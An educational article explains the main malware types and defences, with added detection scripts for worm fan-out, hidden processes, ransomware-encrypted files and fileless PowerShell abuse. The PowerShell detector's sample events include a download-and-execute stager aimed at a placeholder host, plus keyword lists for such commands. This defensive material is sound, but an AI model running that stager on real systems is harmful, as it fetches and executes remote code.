The 16 types of malware used by criminals
Viruses, Trojans, spyware, ransomware… the types of malware used by malicious actors have multiplied and become more sophisticated
Ransomware to extort money from companies and public administrations, Trojans to steal money from bank accounts, infostealers to gain access to confidential corporate and government information… Attacks using one of the many types of malware have been a leading threat to global cybersecurity for decades.
But what is malware? According to the US National Institute of Standards and Technology (NIST), one of the global reference institutions for cybersecurity, it is «software or firmware intended to perform an unauthorised process that will adversely impact the confidentiality, integrity or availability of an information system».
This definition allows us to identify the two critical elements of malware, which, moreover, are embedded in the concept itself:
- It is software or firmware.
- Its use is malicious.
What computer systems are affected by the various types of malware? These malicious codes act on computers, tablets, mobile phones and even OT and IoT devices.
What are the goals of malicious actors that use malware to attack companies, institutions or citizens? They are directly related to the types of malware used. The most common objectives are stealing money, obtaining data to commit economic fraud or extortion, obtaining confidential information, damaging reputation or paralysing business continuity.
In this article, we will detail the main types of malware used today, reflect on the role of social engineering, as-a-Service models or AI and analyse the critical cybersecurity services to combat malware.
1. I’m the creeper, catch me if you can! 50 years of playing cat and mouse
In 1971, the first self-replicating program, Creeper, was born. Written as an experiment rather than as a weapon, this worm spread through the ARPANET, the network created in 1969 by the US Department of Defense's Advanced Research Projects Agency to connect computers at universities and research groups. Infected computers displayed the message: «I'm the creeper, catch me if you can!»
Just one year later, in 1972, the creeper was pruned thanks to Reaper, a program written specifically to hunt down and delete it: in effect, the first antivirus.
Thus began an endless competition between malicious actors and cybersecurity experts. The former develop new types of malware and refine existing ones to overcome systems' defensive mechanisms. The latter continuously research criminals' tactics, techniques and procedures (TTPs) and implement strategies to prevent attacks.
This spiral, together with the digital revolution we have experienced in the last half-century, has led to multiple types of malware, from classic viruses, worms and Trojans to ransomware, the most widespread malware in recent years.
Moreover, cybercriminals have endeavoured to hide the use of malware for as long as possible and to persist on infected systems to achieve their criminal goals. This is why areas such as cyber intelligence or threat hunting have become so important in the fight against all types of malware.
After all, the best way to catch malicious actors is to stay one step ahead of them.
2. Viruses and worms – two similar but different types of malware
After Creeper, other types of malware emerged, such as Wabbit (1974), a self-replicating program that exhausted a machine's resources and is often cited as the first denial-of-service attack; Animal (1975), the first Trojan horse; the compiler backdoor described by Ken Thompson in his 1984 lecture «Reflections on Trusting Trust»; and Brain (1986), the first virus to infect IBM PCs.
Since the 1990s, the emergence of malware has accelerated, and today, new malicious codes are continually emerging to overcome the defensive capabilities of companies and institutions. What are the main types of malware in use today?
2.1. Viruses
A virus is malicious code that attaches itself to a legitimate host, such as a document, an executable or a boot sector, and travels with that file when it is downloaded or shared.
It was one of the most widely used types of malware for decades and is capable of spreading between hosts.
However, to become active it requires the victim to interact with the infected file, for example, by opening a document that carries a malicious macro or running an infected executable.
Once activated, the virus executes its malicious code and infects other files on the system, which in turn carry it to new victims.
Generally, viruses are used by malicious actors to destroy corporate or personal files or to cause operational problems.
2.2. Worm
John von Neumann, one of the most influential mathematicians of the 20th century and a founding figure of computing, pondered in the last years of his life the possibility of creating code capable of self-replication; his lectures on the subject were published posthumously as Theory of Self-Reproducing Automata. What at the time bordered on science fiction is today a reality: one of the most common types of malware is the computer worm.
This malware can rapidly self-replicate and spread itself across the devices that make up a network.
Unlike viruses, worms do not need a host file or any further action by the victim. They spread on their own, typically by exploiting a vulnerability in a network-facing service, abusing weak or stolen credentials, or copying themselves to open network shares. Activation, then, is the big difference between these two types of malware.
Computer worms create copies of themselves and distribute them through the network to which the attacked device is connected. In this way, they seek to spread through the network, increase traffic and cause disruptions and performance problems in the network and the devices that make it up.
Thus, worms can damage the operability of infected networks and cause the loss of valuable data.
It is also important to note that cybercriminals have been perfecting this kind of malware, so that there are worms that resemble the type of malware we will discuss next: Trojans. What does this mean? They do not just spread and saturate traffic; they can also carry a payload that opens a backdoor on every computer they reach.
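The defining behaviour described above, one host reaching many neighbours on the same service in a very short time, is also what makes worms detectable on the network. The following script is an added example, not code from the original article: it runs a fan-out heuristic over a handful of constructed flow records (the IP addresses, timestamps and the list of "lateral-movement" ports are assumptions for the demo) and flags any source that contacts an unusual number of distinct hosts on those ports within a sliding time window.

```python
from collections import defaultdict

# Constructed flow records for the demo (not captured traffic):
# "epoch_seconds source_ip destination_ip destination_port"
SAMPLE_FLOWS = """\
1700000000 10.0.1.20 10.0.1.5 445
1700000001 10.0.1.20 10.0.1.6 445
1700000001 10.0.1.20 10.0.1.7 445
1700000002 10.0.1.20 10.0.1.8 445
1700000002 10.0.1.20 10.0.1.9 445
1700000003 10.0.1.20 10.0.1.10 445
1700000004 10.0.1.20 10.0.1.11 445
1700000005 10.0.1.20 10.0.1.12 445
1700000005 10.0.1.20 10.0.1.13 445
1700000006 10.0.1.20 10.0.1.14 445
1700000010 10.0.1.30 10.0.1.5 445
1700000040 10.0.1.30 10.0.1.6 445
1700000100 10.0.1.40 10.0.1.50 443
1700000101 10.0.1.40 10.0.1.50 443
"""

# Ports worms and lateral-movement tooling commonly use (SMB, NetBIOS, SSH,
# RDP, RPC, WinRM). Assumed list; tune it to what is normal in your network.
LATERAL_PORTS = {445, 139, 22, 3389, 135, 5985}


def parse_flows(text):
    """Parse the whitespace-separated records into (ts, src, dst, port) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        flows.append((int(ts), src, dst, int(port)))
    return flows


def fan_out_alerts(flows, window=30, threshold=8):
    """Return {source_ip: peak_distinct_targets} for every source that contacted
    at least `threshold` distinct hosts on lateral-movement ports within any
    `window`-second span. A user opening one file share never looks like this;
    a worm probing a whole subnet does."""
    per_src = defaultdict(list)
    for ts, src, dst, port in flows:
        if port in LATERAL_PORTS:
            per_src[src].append((ts, dst))

    alerts = {}
    for src, events in per_src.items():
        events.sort()
        peak = 0
        # Slide a window over the time-ordered events and count distinct targets
        for i, (start, _) in enumerate(events):
            targets = set()
            for ts, dst in events[i:]:
                if ts - start > window:
                    break
                targets.add(dst)
            peak = max(peak, len(targets))
        if peak >= threshold:
            alerts[src] = peak
    return alerts


if __name__ == "__main__":
    for src, n in fan_out_alerts(parse_flows(SAMPLE_FLOWS)).items():
        print(f"ALERT worm-like fan-out: {src} reached {n} hosts on lateral ports")
```

In the sample, 10.0.1.20 touches ten different hosts on SMB in six seconds and is flagged, while 10.0.1.30 (two shares in half a minute) and 10.0.1.40 (repeated HTTPS to one server) stay quiet. The threshold and window are the knobs to tune against a baseline of your own environment; vulnerability scanners and backup servers will legitimately trip this rule and belong on an allow-list.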
3. It was all invented in Troy: Types of malware to sneak into computers
3.1. Trojan
The name of this type of malware precisely indicates how it works. Just as the Greeks designed a giant horse to gain entry into the fortified city of Troy and conquer it from within, malicious actors use Trojans to infect devices.
A Trojan poses as legitimate software so that the user installs it on their computer without suspicion. Once running, it infects the device. For what purposes? To access, modify and even delete sensitive data, or to hand control of the machine to the attacker.
Although they are not always included in the Trojan family when the different types of malware are systematised, some malicious codes share very similar characteristics: backdoors, downloaders, droppers, rootkits… What they all have in common is that they open the doors of systems and devices to other malware.
3.2. Backdoor
Today, many malicious actors use Trojans to create backdoors on infected computers.
This variety of malware allows a hostile actor to take control of a computer remotely. Once in control, the criminal can perform critical actions such as sending, receiving, executing or deleting files and stealing information.
In addition, backdoors are also used to build botnets, i.e. zombie networks of infected computers that allow malicious actors to launch distributed denial-of-service (DDoS) attacks against websites, platforms or corporate systems.
3.3. Rootkit
A rootkit takes the backdoor concept a step further. Where a backdoor provides a way in, a rootkit's job is to keep that way in open and invisible: it hides the attacker's files, processes and network connections from the operating system's own tools while preserving administrator privileges.
With maximum privileges, the rootkit can intercept and manipulate system calls so that the attacker's presence inside the system goes unnoticed: a process list, a directory listing or a list of open ports will simply omit the attacker's artefacts.
The central goal of the most sophisticated rootkits is to reach the operating system kernel or an even lower layer: the firmware (UEFI) that runs before the operating system loads.
The most potent firmware-level rootkits, often called bootkits, allow criminals to persist even after formatting the disk and reinstalling the operating system. Combined with remote control, they let an attacker run commands on compromised machines while making it extremely difficult to detect the malicious programs running on them.
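Because a rootkit that filters system calls has to filter every path consistently, inconsistencies between two paths are the classic way to spot one. The script below is an added example, not code from the original article, of the cross-view check used by tools such as unhide on Linux: the process list obtained by listing /proc (the directory-listing path a rootkit usually hooks) is compared with the processes found by asking the kernel about each PID directly with a null signal. Anything that answers the probe but is missing from the listing is a hidden process. The PID range swept (65536) is an assumption to keep the demo fast; read /proc/sys/kernel/pid_max for a full sweep.

```python
import os


def visible_pids():
    """PIDs the way `ps` sees them: by listing the /proc directory. A rootkit
    that hooks the directory-listing path (getdents) filters its own entries
    out here. Returns an empty set on systems without /proc."""
    if not os.path.isdir("/proc"):
        return set()
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}


def probed_pids(limit=65536):
    """PIDs found by asking about each candidate directly instead of listing.
    On POSIX, os.kill(pid, 0) delivers no signal; it only reports whether the
    PID exists (PermissionError still means it exists, owned by someone else).
    Never run this on Windows, where os.kill with signal 0 would TERMINATE
    the process instead, so it is skipped there.
    `limit` is an assumption for the demo; /proc/sys/kernel/pid_max is the real bound."""
    if os.name != "posix":
        return set()
    found = set()
    for pid in range(1, limit + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue
        except PermissionError:
            pass
        except OSError:
            continue
        found.add(pid)
    return found


def hidden_pids(visible, probed):
    """Processes that answer when probed but are missing from the listing."""
    return sorted(set(probed) - set(visible))


def find_hidden_processes(limit=65536):
    """Two-pass check: a process that starts between the listing and the probe
    would look hidden, so every candidate is re-checked against a fresh listing
    and a fresh probe before being reported."""
    if os.name != "posix":
        return []
    candidates = hidden_pids(visible_pids(), probed_pids(limit))
    fresh_listing = visible_pids()
    confirmed = []
    for pid in candidates:
        if pid in fresh_listing:
            continue  # it simply appeared after the first listing
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue  # it already exited: a short-lived process, not a hidden one
        except PermissionError:
            pass
        confirmed.append(pid)
    return confirmed


if __name__ == "__main__":
    hidden = find_hidden_processes()
    print("hidden processes:", hidden or "none")
```

A kernel-level rootkit that hooks both the directory listing and the signal path would pass this check, which is the point of the preceding paragraph: the deeper the rootkit sits, the fewer independent views the defender has left. That is why the same cross-view idea is applied from outside the box, comparing what the host reports with what the hypervisor, a network sensor or an offline disk image shows.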
3.4. Dropper
A dropper is malicious software that downloads other malware onto a victim’s device. As we pointed out when explaining Trojans, one of the keys to droppers lies in their appearance of legitimacy. Users download them because they believe they are real programs.
What is the goal of a dropper? To release its payload or, in other words, to install other malware without the user of the targeted device detecting it. If we wax poetic, we could say that a dropper is like a sherpa leaving a climber one step away from the top of a mountain.
The payload of a dropper does not necessarily have to be malware alone but often includes other files and tools to mask the malicious code.
Why use a dropper instead of installing the malware directly? To get past the security checks and make it through the download phase. In addition, more advanced droppers include mechanisms to neutralise system defences, for example by suppressing the security prompts a user would normally see before a system-level change.
3.5. Downloader
Sometimes the dropper is mistaken for the downloader, mainly because both types of malware have the same purpose: to facilitate the execution of malicious code.
How does a downloader differ from a dropper? The downloader does not carry the payload; it fetches the malicious components from a remote server once it is already running on the victim's machine. In this way, malicious actors keep the file that is initially delivered small and innocuous, which helps it bypass the malware detection mechanisms of devices and systems, and lets them change the payload from one campaign to the next.
Downloaders also often modify the Windows registry of the infected computer, for example by adding the malware they fetch to the keys that run programs at start-up. For what purpose? To make the malware survive a reboot, i.e. to achieve persistence.
4. Spyware: Types of malware used to spy on victims
The days of film noir spies are long gone. Nowadays, espionage is mainly carried out in the digital realm.
That is why cybercriminals have developed various types of malware that serve to spy on the devices and systems of companies, citizens and public institutions.
In fact, since the 1990s, the term spyware has been used to refer to malicious software used to infect computers, mobile phones and other internet-connected devices in order to spy on the people who use them.
Criminals install spyware on devices without the consent of the people using them. Spyware is usually bundled with legitimate programs, files, web pages or mobile apps.
When criminals manage to insert them into operating systems, spyware starts its activity in the background to avoid detection by victims.
Within the spyware category, cybersecurity specialists include some of the most common types of malware used in recent years to steal corporate, government, personal and financial data.
4.1. Stealer
The two most common types of stealers are infostealers and password stealers. As their names suggest, these types of malware are used to steal information stored on a computer, or specifically the passwords and credentials that grant access to programs, websites or applications.
Like other types of malware, stealers reach victims' devices through social engineering attacks or as a Trojan payload. Either way, once running, the stealer scans the computer to collect the credentials stored on it, for example in browsers or installed software, along with browser cookies and session tokens that let the attacker impersonate the user without ever knowing the password. Stealers can also gather other information about the computer and its user, and even take screenshots of the device.
4.2. Keylogger
A keylogger is software that can record every user’s keystroke on a device. As with other types of malware, keyloggers are not, by definition, malicious software. However, their use by cybercriminals transforms them into weapons.
Why? A malicious actor can use a keylogger to capture passwords, intercept sensitive information as the user types it, and even steal credit card or bank account credentials.
Where is a keylogger installed? As software, it can hook the keyboard at the operating-system or keyboard-API level or run as a kernel component; hardware keyloggers plugged in between the keyboard and the computer also exist.
It should also be noted that detection is complex, because they generally have no impact on the performance of the infected computer and because keylogger developers are effective at circumventing antivirus software and hiding the presence of the malware.
4.3. Banking Trojan
Given what we have discussed in this article, we can see that the categorisation of the various types of malware is complex not only because they are sometimes used in a hybrid way, but also because they have many elements in common.
An infamous class of malware are banking Trojans. Although they carry the Trojan concept in their name, they can be considered a subtype of spyware.
Malicious actors use banking Trojans to steal the login credentials of their victim’s bank accounts to steal money from them or to use this information to construct fake identities and carry out fraud.
They typically operate inside the browser, a technique known as man-in-the-browser: by injecting code into the financial institution's legitimate web page as it is rendered, they can add fake form fields, capture credentials as they are typed or silently alter the details of a transfer.
5. Adware: A pernicious advertising blast
Another type of malware that needs to be addressed is adware. This malicious program has a peculiar mission: to show users of infected computers advertisements that generate financial benefits for the attackers.
This malware can be installed as a program in the operating system or as a browser extension. Once running, it continuously shows unwanted or misleading advertisements to the person using the device, while obscuring where the bombardment comes from.
6. Ransomware: Extortion as a business model
Ransomware attacks are one of the biggest threats we face in cybersecurity. In recent years, attacks using this type of malware have multiplied and impacted companies in various economic sectors: finance, industry, health, education, etc.
What does this malware consist of? It is a malicious program that, once it has gained access to a computer, enumerates files, images, emails and documents. It then encrypts them so that the attacked company or institution can no longer access its data.
Criminals then demand a ransom in exchange for the decryption key. In addition, in so-called double-extortion schemes, they exfiltrate the data before encrypting it and threaten to publish it or trade it on the Dark Web, which can cause a reputational, economic and legal crisis.
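Encryption leaves a measurable trace: a ciphertext file is statistically indistinguishable from random bytes, and most ransomware families also rename what they encrypt. The script below is an added example, not code from the original article, of the two cheapest checks a file-server monitor or incident responder can run: Shannon entropy of the file content, with an exemption for formats that are legitimately near-random (compressed archives, images, PDFs), and a watch-list of appended extensions. The sample corpus, the suffix list and the 7.5-bit threshold are assumptions for the demo; a seeded random generator stands in for ciphertext.

```python
import math
import os
import random
from collections import Counter

# Suffixes ransomware families commonly append to encrypted files. Assumed
# watch-list for the demo; in production feed it from current threat intel.
SUSPICIOUS_SUFFIXES = (".locked", ".encrypted", ".crypt", ".enc", ".crypted")

# Magic bytes of formats that are legitimately near-random (compressed or
# already encrypted), so their high entropy is not evidence of ransomware.
HIGH_ENTROPY_FORMATS = (
    b"PK\x03\x04",      # zip / docx / xlsx / jar
    b"\x1f\x8b",        # gzip
    b"%PDF",            # pdf (compressed streams)
    b"\xff\xd8\xff",    # jpeg
    b"\x89PNG",         # png
    b"7z\xbc\xaf",      # 7-zip
)


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: ~4.5 for English text, close to 8 for ciphertext."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify(name: str, data: bytes, threshold: float = 7.5):
    """Return the list of reasons a file looks ransomware-encrypted (empty if clean)."""
    reasons = []
    if name.lower().endswith(SUSPICIOUS_SUFFIXES):
        reasons.append("ransomware-style extension")
    if not data.startswith(HIGH_ENTROPY_FORMATS) and shannon_entropy(data) >= threshold:
        reasons.append("near-random content without a known compressed format header")
    return reasons


def scan_files(files: dict):
    """files: {name: leading bytes of content}. Returns only the suspicious ones."""
    return {name: reasons for name, data in files.items() if (reasons := classify(name, data))}


def scan_directory(root: str, head: int = 65536):
    """Walk a real directory tree, reading only the first `head` bytes of each file."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            path = os.path.join(dirpath, n)
            try:
                with open(path, "rb") as f:
                    files[path] = f.read(head)
            except OSError:
                continue
    return scan_files(files)


# Constructed sample corpus (not real files). The seeded generator stands in
# for ciphertext, since good encryption output is indistinguishable from random.
_rng = random.Random(2024)
_random_bytes = bytes(_rng.getrandbits(8) for _ in range(8192))
SAMPLE_FILES = {
    "notes.txt": b"Quarterly figures, draft 3. Revenue flat, costs up 4%.\n" * 100,
    "report.docx.locked": _random_bytes,                  # renamed and encrypted
    "backup.bak": _random_bytes[::-1],                    # encrypted in place, name unchanged
    "holiday.jpg": b"\xff\xd8\xff\xe0" + _random_bytes,   # legitimate high-entropy format
}

if __name__ == "__main__":
    for name, why in scan_files(SAMPLE_FILES).items():
        print(f"SUSPECT {name}: {', '.join(why)}")
```

Run over the sample, the renamed file is caught on both signals and backup.bak on entropy alone, while the JPEG is exempted by its header and the text file sits well under the threshold. In practice the signal that matters is the rate: one high-entropy file is a backup or an archive, hundreds appearing in a minute from a single workstation is the encryption phase in progress, which is exactly when blocking the account still saves most of the data.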
Every week, ransomware attacks are publicised, which, in the worst cases, can bring a company or public entity to a standstill.
The success of this type of malware lies in the fact that it facilitates rapid monetisation of the attack by criminals. In addition, the proliferation of Ransomware-as-a-Service programmes, which package this malware, has allowed attackers without knowledge or resources to launch ransomware campaigns.
7. Wiper: The power of destruction
Of all types of malware, wipers have the most devastating power. This malware is not used to spy on victims, disrupt their operations or hijack their data. Criminals use wipers to delete data, erase the trail of an attack and the system events that record it, remove evidence of criminal actions, or simply cause irreparable damage to a system or network.
Therefore, the most common targets of a wiper attack are:
- Companies operating in strategic sectors, such as energy.
- Public institutions.
Consequently, wipers are generally designed and deployed by groups with advanced knowledge and financial resources, often sponsored by states.
In such a way, wipers function as another tool in a geostrategic conflict, as seen in the Russian invasion of Ukraine.
8. Drainer: Emptying crypto-wallets
Malicious actors are constantly improving the various types of malware and designing new malware variants. The best example of this is the proliferation of crypto drainers.
This type of malware seeks to steal the cryptocurrencies an investor holds in their wallet. It illustrates a constant in criminal behaviour: taking advantage of the opportunities generated by the emergence of new technologies and changes in society and the economy.
How do crypto drainers reach investors' wallets? Typically, sophisticated phishing campaigns (fake airdrops, fake minting pages, impersonated projects) lead victims to a malicious website that asks them to connect their wallet and sign a transaction or token approval; that signature is what hands the attacker the funds.
9. Cryptojacking: Using other people’s devices to get rich from cryptocurrency mining
Another cryptocurrency-related malware is cryptojacking. In this case, the aim is not to steal cryptos from investors' wallets but to use the victims' computing power: either by infecting their servers and computers with a mining program, or by injecting mining code into web pages so that every visitor's browser mines for the attacker.
Cryptocurrency mining can be a very lucrative activity. However, purchasing devices requires a significant outlay and is very electricity-intensive.
How do cybercriminals overcome these problems, which reduce the profitability of cryptocurrency mining? By infecting other people’s devices and using their resources and processing power to mine cryptocurrencies without the victims noticing.
What are the consequences of this type of malware for people whose devices are infected? They become slower, their hardware wears out sooner under sustained load and heat, and their electricity bills increase.
In early 2024, in an operation supported by Europol, police arrested a cryptojacker who had made 1.8 million euros by mining cryptocurrency on other people's infrastructure, at the victims' expense.
10. Fileless: The dangers of fileless malware
As we said at the beginning of this guide to the different types of malware, over the last 50 years, cybercriminals have evolved malware to undermine companies' defensive capabilities and achieve their goals. The result of this criminal innovation is fileless malware: a class of malware that runs without writing its own executable to disk, so there is no malicious file for traditional antivirus to scan.
This malware lives off the land: it uses tools already present on the system, such as PowerShell, WMI or the built-in scripting engines, and injects code into the memory of legitimate processes to open a backdoor and execute code remotely.
So, firstly, fileless malware, like spyware or ransomware, aims to persist on the systems it infects and go undetected, which is why it often hides inside software and processes that victims trust. Secondly, it is generally used to steal critical information, such as financial data or confidential information, from companies or institutions.
Today, cybercriminals have designed fileless variants of most types of malware (rootkits, ransomware, etc.), all to leave as little trace as possible on the attacked systems and evade detection by the new generation of antivirus and EDR products.
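With no file to scan, detection moves to process behaviour: which process started the interpreter, and what it was told to run. The script below is an added example, not code from the original article or from any vendor's product. It analyses a few constructed process-creation events in the shape Sysmon-style telemetry provides (image, parent image, command line; the paths, hostnames and the `example.invalid` URLs are invented for the demo), decodes PowerShell's `-EncodedCommand` argument (Base64 over UTF-16LE), and scores the usual fileless signals: an Office application spawning a script host, a hidden window, profile bypass, and download-and-execute-in-memory commands in the decoded script. The weights and the alert threshold are assumptions to tune against your own baseline.

```python
import base64
import re

# Script hosts and other living-off-the-land binaries worth scrutinising
LOLBINS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "regsvr32.exe", "rundll32.exe")
# Parents that have no business launching a script host
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

# Scoring (assumed weights): strong tokens mean download/run-in-memory,
# weak ones are common evasion flags that legitimate scripts also use.
STRONG_TOKENS = {"iex": 2, "invoke-expression": 2, "downloadstring": 2, "downloadfile": 2,
                 "invoke-webrequest": 2, "frombase64string": 2, "reflection.assembly": 2}
WEAK_TOKENS = {"-nop": 1, "-w hidden": 1, "-windowstyle hidden": 1, "bypass": 1}
ALERT_THRESHOLD = 3

# -e, -ec, -en, -enc and -encodedcommand are all accepted by powershell.exe
_ENC_RE = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def encode_for_powershell(script: str) -> str:
    """How PowerShell expects -EncodedCommand: Base64 of the UTF-16LE script.
    Used here only to build the constructed sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the plaintext script hidden behind -EncodedCommand, or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError
        return None


def analyse_event(ev: dict):
    """Score one process-creation event; returns (score, reasons)."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in LOLBINS:
        return 0, []
    score, reasons = 0, []
    if parent in OFFICE_PARENTS:
        score += 3
        reasons.append(f"{parent} spawned {image}")
    decoded = decode_encoded_command(ev["CommandLine"])
    if decoded is not None:
        score += 2
        reasons.append("encoded command line")
    # Strip the Base64 blob so its letters cannot accidentally match a token
    text = (_ENC_RE.sub(" ", ev["CommandLine"]) + " " + (decoded or "")).lower()
    for token, weight in {**STRONG_TOKENS, **WEAK_TOKENS}.items():
        if token in text:
            score += weight
            reasons.append(f"token {token!r}")
    return score, reasons


def analyse_events(events):
    """{index: (score, reasons)} for every event at or above the alert threshold."""
    return {i: r for i, ev in enumerate(events) if (r := analyse_event(ev))[0] >= ALERT_THRESHOLD}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a.ps1')"

# Constructed events (not real telemetry)
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "Image": PS,
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(STAGER)},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\todo.txt"},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": PS,
     "CommandLine": 'powershell.exe -w hidden -nop -c "' + STAGER + '"'},
]

if __name__ == "__main__":
    for i, (score, reasons) in analyse_events(SAMPLE_EVENTS).items():
        print(f"ALERT event {i} score={score}: {'; '.join(reasons)}")
```

The Word-spawned, encoded stager scores highest and the plaintext one launched as a service still clears the threshold, while the admin's `-NoProfile` listing and the `-ExecutionPolicy Bypass` backup job, which would both fire a naive flag-matching rule, stay below it. The decoding step is the part to keep even if you discard the scoring: an encoded command line is opaque to every string-based rule until someone turns it back into the script it carries.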
11. The hybridisation of malware has made attacks more complex
In addition to designing new types of malware and evolving malware, malicious actors have become more sophisticated in designing cyberattacks over the decades.
As a result, it is now common for a single attack to employ several types of malware at the same time or in a concatenated manner.
For example, a criminal group may use a Trojan with a ransomware payload and then use a wiper to erase its trail and remove any evidence.
The main consequence of malware hybridisation is that the detection of security incidents becomes extraordinarily complex, as the ability of malicious actors to persist on an infected system without attracting the attention of detection mechanisms increases dramatically.
The more complex the criminals' strategies to achieve their goals, the more effort cybersecurity professionals have to put into discovering the malicious actors' tactics, techniques and procedures and putting in place the measures needed to make them ineffective. In other words, if the mouse hides extraordinarily well, the cat has to work harder and sharpen its wits to find it.
12. Social engineering: The big gateway for all types of malware
Beyond the combined use of various malware, we must focus on the relationship between malware and social engineering techniques such as phishing.
Most cyber-attacks have a social engineering dimension, especially regarding the attack vector. Hence, it is common to use phishing as a spearhead to break into the computers, networks, and systems that are to be attacked.
2024 started with disturbing news: Microsoft reported that an Iranian Advanced Persistent Threat (APT) group was targeting researchers in Europe and the United States with spear-phishing to infect their computers with a backdoor called MediaPl. This program exchanges information with a command-and-control (C2) server while masquerading as Windows Media Player to avoid detection.
In light of what we have unpacked in this article, we can see that social engineering is essential to get victims to perform actions that allow the malicious code to execute, whether it is downloading a file, executing a file, clicking on a link or downloading a fake web or mobile application.
13. Cybersecurity to deal with the multiple types of malware
What can companies and public administrations do to prevent malware from causing a security incident that leads to significant financial loss, legal repercussions and reputational damage? Entrust the pursuit of the mice, i.e. the malicious actors, to the cats, i.e. the cybersecurity experts.
13.1. Critical cybersecurity services
To prevent, detect and mitigate malware attacks, professionals can put in place essential cybersecurity services such as:
- Social engineering tests, such as simulated phishing campaigns, to raise awareness and train all professionals in an organisation.
- Testing of web security, mobile applications, IoT devices, cloud infrastructures and code audits to assess their security and detect vulnerabilities that malicious actors can exploit.
- Red Team scenarios focused on various types of malware to train defence teams and assess the effectiveness of measures to prevent, detect and respond to ransomware and other malware attacks to improve them continually.
- Threat Hunting services to anticipate malicious actions by understanding the latest tactics, techniques and procedures employed by criminals and optimising detection capabilities.
- Incident response services to limit the impact of malware, expel malicious actors and help organisations get back to business as usual in the shortest possible time and with maximum guarantees.
13.2. Good practices in cybersecurity
Beyond implementing these cybersecurity services, organisations should promote good cybersecurity practices among all their professionals. How? By applying the basic recommendations proposed by cybersecurity experts:
- Do not download software from untrusted sources.
- Use only authorised applications.
- Update all software continuously to apply security patches developed by vendors.
- Have an antivirus installed on all computers.
- Limit user privileges as much as possible.
In short, the current threat landscape is dominated by multiple types of malware that can cause severe damage, especially as malware is becoming increasingly sophisticated and the tactics, techniques and procedures used by criminals are continually becoming more complex in order to defeat organisations' security mechanisms.
Therefore, companies and administrations must treat the malware epidemic as a strategic issue and use cybersecurity services to prepare for this kind of attack.
A company must ask itself not whether it will suffer an attack that seeks to infect its computers with malware but rather, «Are we prepared to deal with the attack successfully?»